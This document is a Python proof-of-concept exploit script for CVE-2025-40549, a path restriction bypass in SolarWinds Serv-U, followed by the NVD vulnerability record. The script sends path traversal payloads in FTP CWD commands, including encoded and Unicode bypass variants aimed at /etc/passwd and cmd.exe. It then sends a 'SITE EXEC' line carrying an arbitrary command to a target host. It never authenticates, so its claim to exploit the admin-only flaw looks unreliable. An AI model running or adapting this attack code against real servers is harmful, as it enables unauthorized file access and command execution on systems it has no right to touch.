CVE-2025-40549

# CVE-2025-40549 PoC - Serv-U Path Restriction Bypass # This PoC demonstrates the path restriction bypass vulnerability # Requires administrator privileges to exploit import socket import sys def exploit_serv_u_path_bypass(target_host, target_port, cmd): """ Exploit for CVE-2025-40549: Serv-U Path Restriction Bypass This demonstrates how an attacker with admin privileges can bypass path restrictions to execute commands on restricted directories. """ # Path traversal payload examples path_payloads = [ "../../../../etc/passwd", "../../../../windows/system32/cmd.exe", "..\\..\\..\\windows\\system32\\cmd.exe", "%2e%2e%2f%2e%2e%2f%2e%2e%2f", # URL encoded "..%c0%af..%c0%af..%c0%af", # Unicode bypass ] # Construct FTP/SFTP command with path traversal for payload in path_payloads: # Attempt to access restricted paths via path traversal ftp_command = f"CWD {payload}\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Send malicious path traversal request sock.send(ftp_command.encode()) response = sock.recv(1024) print(f"[*] Payload: {payload}") print(f"[*] Response: {response.decode('utf-8', errors='ignore')}") sock.close() except Exception as e: print(f"[!] Error with payload {payload}: {str(e)}") # Admin command execution via Serv-U admin interface admin_payload = f"SITE EXEC {cmd}" print("\n[*] Attempting admin command execution...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) sock.send(admin_payload.encode()) response = sock.recv(4096) print(f"[*] Command executed: {cmd}") print(f"[*] Response: {response.decode('utf-8', errors='ignore')}") sock.close() except Exception as e: print(f"[!] Command execution failed: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve_2025_40549_poc.py <target_host> <port> <command>") print("Example: python cve_2025_40549_poc.py 192.168.1.100 22 'whoami'") sys.exit(1) target_host = sys.argv[1] target_port = int(sys.argv[2]) cmd = sys.argv[3] print(f"[*] Targeting Serv-U server: {target_host}:{target_port}") print(f"[*] CVE-2025-40549 Path Restriction Bypass PoC") print("=" * 60) exploit_serv_u_path_bypass(target_host, target_port, cmd)

{"cve": {"id": "CVE-2025-40549", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:52.347", "lastModified": "2025-12-02T16:37:16.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Path Restriction Bypass vulnerability exists in Serv-U that when abused, could give a malicious actor with access to admin privileges the ability to execute code on a directory. \n\nThis issue requires administrative privileges to abuse. On Windows systems, this scored as medium due to differences in how paths and home directories are handled."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:solarwinds:serv-u:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.5.3", "matchCriteriaId": "5536873C-698D-4936-AA0C-63D0BE2CD3E2"}]}]}], "references": [{"url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-3_release_notes.htm", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40549", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}